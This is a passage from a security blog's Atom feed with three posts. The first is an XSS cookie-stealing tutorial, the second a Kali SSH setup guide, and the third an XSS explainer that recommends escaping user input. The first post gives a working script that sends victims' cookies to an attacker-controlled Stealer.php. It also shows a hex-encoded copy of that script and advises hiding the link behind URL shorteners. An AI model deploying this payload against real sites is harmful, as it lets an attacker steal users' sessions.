&lt;h3 id=&quot;Step-3-Exploiting-the-XSS-Vulnerability&quot;&gt;&lt;a href=&quot;#Step-3-Exploiting-the-XSS-Vulnerability&quot; class=&quot;headerlink&quot; title=&quot;Step 3:Exploiting the XSS Vulnerability&quot;&gt;&lt;/a&gt;Step 3:Exploiting the XSS Vulnerability&lt;/h3&gt;&lt;p&gt;So Far , we have sharpened our saw. Now we are going to use it.&lt;br&gt;Once you set up everything and find a Vulnerable site,then inject the following code in the Vulnerable sites.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&amp;lt;script&amp;gt;location.href = &amp;apos;http://www.Yoursite.com/Stealer.php?cookie=&amp;apos;+document.cookie;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;/p&gt;
&lt;h3 id=&quot;Cookie-Stealing-with-Non-Persistent-vs-Persistent-XSS&quot;&gt;&lt;a href=&quot;#Cookie-Stealing-with-Non-Persistent-vs-Persistent-XSS&quot; class=&quot;headerlink&quot; title=&quot;Cookie Stealing with Non-Persistent vs Persistent XSS:&quot;&gt;&lt;/a&gt;Cookie Stealing with Non-Persistent vs Persistent XSS:&lt;/h3&gt;&lt;p&gt;&lt;strong&gt;Persistent:&lt;/strong&gt; if you inject this code in Persistent XSS vulnerable site, it will be there forever until admin find it. It will be shown to all users. So attackers don’t need to send any link to others. Whoever visit the page, they will be vicim.  &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Non-Persistent:&lt;/strong&gt; In case of Non-persistent attack, attacker will send the link to victims. Whenever they follow the link, it will steal the cookie. Most of sites are vulnerable to Non-persistent XSS .&lt;/p&gt;
&lt;p&gt;In Non-persistence, Attackers will send the injected link victims.&lt;br&gt;For example:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;hxxp://www.VulnerableSite.com/index.php?search=&amp;lt;script&amp;gt;location.href = &amp;apos;http://www.Yoursite.com/Stealer.php?cookie=&amp;apos;+document.cookie;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The above link is clearly shows the scripts. Hackers can Hex-encode this script so that victim can’t see the script.&lt;br&gt;For Example:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;xxp://www.VulnerableSite.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Still , the link look long. The attacker use one more trick to hide the long url i.e url shortening sites. There are lot of sites that shorten the long url into tiny url.&lt;/p&gt;
&lt;h2 id=&quot;How-to-Secure-from-this-attack&quot;&gt;&lt;a href=&quot;#How-to-Secure-from-this-attack&quot; class=&quot;headerlink&quot; title=&quot;How to Secure from this attack?&quot;&gt;&lt;/a&gt;How to Secure from this attack?&lt;/h2&gt;&lt;p&gt;Use No-Script Addon. This is best protection to stay away from XSS  &lt;/p&gt;
&lt;p&gt;Never Click the Shorten url  &lt;/p&gt;
&lt;p&gt;Sometime you may want to follow the shorten link. If so, then clear all cookies in your browser and visit through Proxy or VPN(it will hide your ip)&lt;br&gt;&lt;br&gt;&lt;/p&gt;
</content>

    <summary type="html">

      &lt;h2 id=&quot;Basic-Knowledge-about-Cookies&quot;&gt;&lt;a href=&quot;#Basic-Knowledge-about-Cookies&quot; class=&quot;headerlink&quot; title=&quot;Basic Knowledge about Cookies&quot;&gt;&lt;/a

    </summary>

      <category term="B-XSS" scheme="http://sec.php101.cn/categories/B-XSS/"/>


  </entry>

  <entry>
    <title>Enable SSH ON Kali</title>
    <link href="http://sec.php101.cn/2015/11/06/Enable-SSH-ON-Kali/"/>
    <id>http://sec.php101.cn/2015/11/06/Enable-SSH-ON-Kali/</id>
    <published>2015-11-05T17:56:46.000Z</published>
    <updated>2016-03-17T08:46:09.000Z</updated>

    <content type="html">&lt;h2 id=&quot;Enable-Kali-Linux-remote-SSH-service&quot;&gt;&lt;a href=&quot;#Enable-Kali-Linux-remote-SSH-service&quot; class=&quot;headerlink&quot; title=&quot;Enable Kali Linux remote SSH service&quot;&gt;&lt;/a&gt;Enable Kali Linux remote SSH service&lt;/h2&gt;&lt;p&gt;First of all remove run levels for SSH.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;root@kali~:# update-rc.d -f ssh remove&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Next load SSH defaults to run level&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;root@kali~:# update-rc.d -f ssh defaults&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Check if SSH service is up and running&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;root@kali~:# chkconfig ssh&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;If you don’t have chkconfig installed, install via&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;root@kali~:# apt-get install chkconfig&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;h2 id=&quot;Change-Kali-default-ssh-keys-to-avoid-MITM-attack&quot;&gt;&lt;a href=&quot;#Change-Kali-default-ssh-keys-to-avoid-MITM-attack&quot; class=&quot;headerlink&quot; title=&quot;Change Kali default ssh keys to avoid MITM attack&quot;&gt;&lt;/a&gt;Change Kali default ssh keys to avoid MITM attack&lt;/h2&gt;&lt;p&gt;Move the default Kali ssh keys to a new folder:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;5&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;root@kali:~#  cd /etc/ssh/&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;root@kali:/etc/ssh#  mkdir default_kali_keys&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;root@kali:/etc/ssh# &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;root@kali:/etc/ssh#  mv ssh_host_* default_kali_keys/&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;root@kali:/etc/ssh#&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;This will move your default keys to the new folder.&lt;/p&gt;
&lt;p&gt;Use the following command to regenerate SSH keys&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;6&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;root@kali:/etc/ssh#  dpkg-reconfigure openssh-server&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Creating SSH2 RSA key; this may take some time ...&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Creating SSH2 DSA key; this may take some time ...&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Creating SSH2 ECDSA key; this may take some time ...&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;[ ok ] Restarting OpenBSD Secure Shell server: sshd.&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;root@kali:/etc/ssh#&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Verify ssh key hashes are different, Use the following commands to verify SSH key hashes are different&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;8&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;root@kali:/etc/ssh#  md5sum ssh_host_*&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;d5dff2404dd43ee0d9ed967f917fb697  ssh_host_dsa_key&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2ec88dc08f24c39077c47106aab1e7f4  ssh_host_dsa_key.pub&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;ab96da6ffc39267f06e7f9497c4f5755  ssh_host_ecdsa_key&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;614e36d18dc2c46178d19661db4dbd7b  ssh_host_ecdsa_key.pub&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;abcc037705e48b3da91a2300d42e6a2b  ssh_host_rsa_key&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;e26eaa1c5cff38457daef839937fcedd  ssh_host_rsa_key.pub&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;root@kali:/etc/ssh#&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Compare new key hashes to the hashes below)&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;10&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;root@kali:/etc/ssh#  cd default_kali_keys/&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;root@kali:/etc/ssh#&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;root@kali:/etc/ssh/default_kali_keys#  md5sum *&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;9a09f49be320e561dc6cf95463d4378c  ssh_host_dsa_key&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;1a52709d596569224822e870239c9298  ssh_host_dsa_key.pub&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;65d0af7fdc5c50f67f90cb953460ba61  ssh_host_ecdsa_key&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;606d1ac71100c8b38e0f87951bb94855  ssh_host_ecdsa_key.pub&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;c871ecf961924389f2cddbd5888b5037  ssh_host_rsa_key&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;99d4c4c68224900d0430f0bee9baf28e  ssh_host_rsa_key.pub&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;root@kali:/etc/ssh/default_kali_keys#&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Restart SSH.&lt;/p&gt;
&lt;h2 id=&quot;Set-MOTD-with-a-nice-ASCII&quot;&gt;&lt;a href=&quot;#Set-MOTD-with-a-nice-ASCII&quot; class=&quot;headerlink&quot; title=&quot;Set MOTD with a nice ASCII&quot;&gt;&lt;/a&gt;Set MOTD with a nice ASCII&lt;/h2&gt;&lt;p&gt;Go to &lt;a href=&quot;http://patorjk.com/software/taag/&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://patorjk.com/software/taag/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Type something in “Type Something” Box! Play around with the settings and you get a nice ASCII art.&lt;/p&gt;
&lt;p&gt;Edit the following file and add your text.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;root@kali:~# vi /etc/motd &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;root@kali:~# service ssh restart&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;h2 id=&quot;important&quot;&gt;&lt;a href=&quot;#important&quot; class=&quot;headerlink&quot; title=&quot;important&quot;&gt;&lt;/a&gt;important&lt;/h2&gt;&lt;p&gt;This will work on sysV systems, but the newest ubuntu uses systemd to control the boot process. In order to get sshd to start on boot for a systemd system, you need to&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;systemctl enable ssh.socket&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;update-rc.d -f ssh enable 2 3 4 5&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
</content>

    <summary type="html">

      &lt;h2 id=&quot;Enable-Kali-Linux-remote-SSH-service&quot;&gt;&lt;a href=&quot;#Enable-Kali-Linux-remote-SSH-service&quot; class=&quot;headerlink&quot; title=&quot;Enable Kali Linux re

    </summary>

      <category term="T-Tools" scheme="http://sec.php101.cn/categories/T-Tools/"/>


  </entry>

  <entry>
    <title>Cross-Site Scripting (XSS) in Plain English</title>
    <link href="http://sec.php101.cn/2014/12/10/Cross-Site-Scripting-(XSS)-in-Plain-English/"/>
    <id>http://sec.php101.cn/2014/12/10/Cross-Site-Scripting-(XSS)-in-Plain-English/</id>
    <published>2014-12-10T09:38:24.000Z</published>
    <updated>2016-03-17T08:45:54.000Z</updated>

    <content type="html">&lt;h2 id=&quot;Preface&quot;&gt;&lt;a href=&quot;#Preface&quot; class=&quot;headerlink&quot; title=&quot;Preface&quot;&gt;&lt;/a&gt;Preface&lt;/h2&gt;&lt;p&gt;Welcome to my weekly series where I explain different types of website attacks in plain English, steering clear of heavy security jargon commonly found in articles of this nature. Today, I’d like to tackle Cross-Site Scripting, more commonly known by the much scarier acronym XSS.  &lt;/p&gt;
&lt;p&gt;Modern websites are far more complex than the static pages that used to rule the internet. These days, it is more accurate call them web applications, due to the growing trend of replacing server-side logic with client-side Javascript. While Javascript as a programming language has evolved over the years, the ways that Javascript code is meant to be added to a web page have not. This is why we can still use &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; and &lt;code&gt;&amp;lt;/script&amp;gt;&lt;/code&gt; tags inside of HTML documents and put any Javascript we want inside of them, and this is the main reason why XSS is still rampant today.  &lt;/p&gt;
&lt;p&gt;XSS allows malicious users to inject client-side code (mainly Javascript) into web pages to be run by other unsuspecting users. It may be easier to understand with an example. Suppose I’m a web developer creating a hot new search engine: example.com. At its basic level, the search engine requires two pages. The first page, &lt;a href=&quot;http://www.example.com&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.example.com&lt;/a&gt;, only contains a search box.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&amp;lt;form action=&amp;quot;/search&amp;quot; method=&amp;quot;get&amp;quot;&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;  &amp;lt;input type=&amp;quot;text&amp;quot; name=&amp;quot;query&amp;quot; /&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;lt;/form&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The second page contains the list of search results. As a friendly reminder to the user, it also includes their search term. The server-side code that generates that piece of HTML, here implemented using Sinatra, may look something like this.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;9&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;require &amp;apos;sinatra&amp;apos;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;get &amp;apos;/search&amp;apos; do&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;  html = &amp;quot;&amp;quot;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;  # ...&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;  html += &amp;quot;Here are the results found for: #&amp;#123;params[:query]&amp;#125;&amp;quot;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;  # ...&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;  return html&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;end&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;h2 id=&quot;The-Danger&quot;&gt;&lt;a href=&quot;#The-Danger&quot; class=&quot;headerlink&quot; title=&quot;The Danger&quot;&gt;&lt;/a&gt;The Danger&lt;/h2&gt;&lt;p&gt;Using typical string interpolation here presents a problem to the user’s browser because it cannot differentiate between HTML intended by my code and any HTML entities that may exist inside the query parameter. As a result, it is easy for an attacker to exploit this by typing the following into the search box:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&amp;lt;script&amp;gt;alert(&amp;apos;hacked!&amp;apos;);&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Our original intent was to remind the user of what her search term was, so we want everything inside the paragraph tags to be treated as plain text:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;...&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;lt;p&amp;gt;Here are the results found for: &amp;lt;script&amp;gt;alert(&amp;apos;hacked!&amp;apos;);&amp;lt;/script&amp;gt;&amp;lt;/p&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;...&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Unfortunately, the script tags here get parsed just like any other script tag, and the Javascript code between them gets executed. The browser does not know the difference between the script tag inserted via user input and a script tag inserted by us.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;...&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;lt;p&amp;gt;Here are the results found for: &amp;lt;script&amp;gt;alert(&amp;apos;hacked!&amp;apos;);&amp;lt;/script&amp;gt;&amp;lt;/p&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;...&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;At this point you might be thinking, “So what? Javascript is client-side, so the attacker only managed to accomplish hacking himself.” Unfortunately, this is not the whole story. At this point the attacker’s URL bar reads &lt;a href=&quot;http://www.example.com?query=&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.example.com?query=&lt;/a&gt;&lt;script&gt;alert(‘hacked!’);&lt;/script&gt;, and she could easily copy this URL and paste it somewhere in an effort to get potential victims to click on it. She could post it to public forums, send e-mails to example.com users that include this link (with a tempting title like “Check out these cat pictures!”) or embed this page on her own site using an invisible iframe. In any case, the malicious Javascript code then runs on the unsuspecting victim’s computer. Notice how this differs from another popular attack, SQL injection, in that XSS is aimed at users of the website, not the website itself.  &lt;/p&gt;
&lt;p&gt;The worst part is that because Javascript is designed to be a powerful tool to manipulate a web page, this kind of attack can be devastating. An attacker can use XSS to steal users’ cookies and use those to impersonate them at example.com, steal their credit card information, or even trick them into installing and downloading malware. Anything that HTML and Javascript can do, the attacker can do.  &lt;/p&gt;
&lt;h2 id=&quot;The-Answer&quot;&gt;&lt;a href=&quot;#The-Answer&quot; class=&quot;headerlink&quot; title=&quot;The Answer&quot;&gt;&lt;/a&gt;The Answer&lt;/h2&gt;&lt;p&gt;The main defense against XSS is to escape all user input. Escaping user input is the technique of replacing certain characters with other equivalent characters to remove ambiguity for a browser’s parsers. Doing this properly is a solid defense against XSS, because escaped characters signal to a parser that they are to be treated as text and never as code. To do this properly, we have to identify which characters are safe to display without being mistaken for characters can switch out of the current context. Every character not in this safe list needs to be escaped, so that the browser does not treat them as executable code.  &lt;/p&gt;
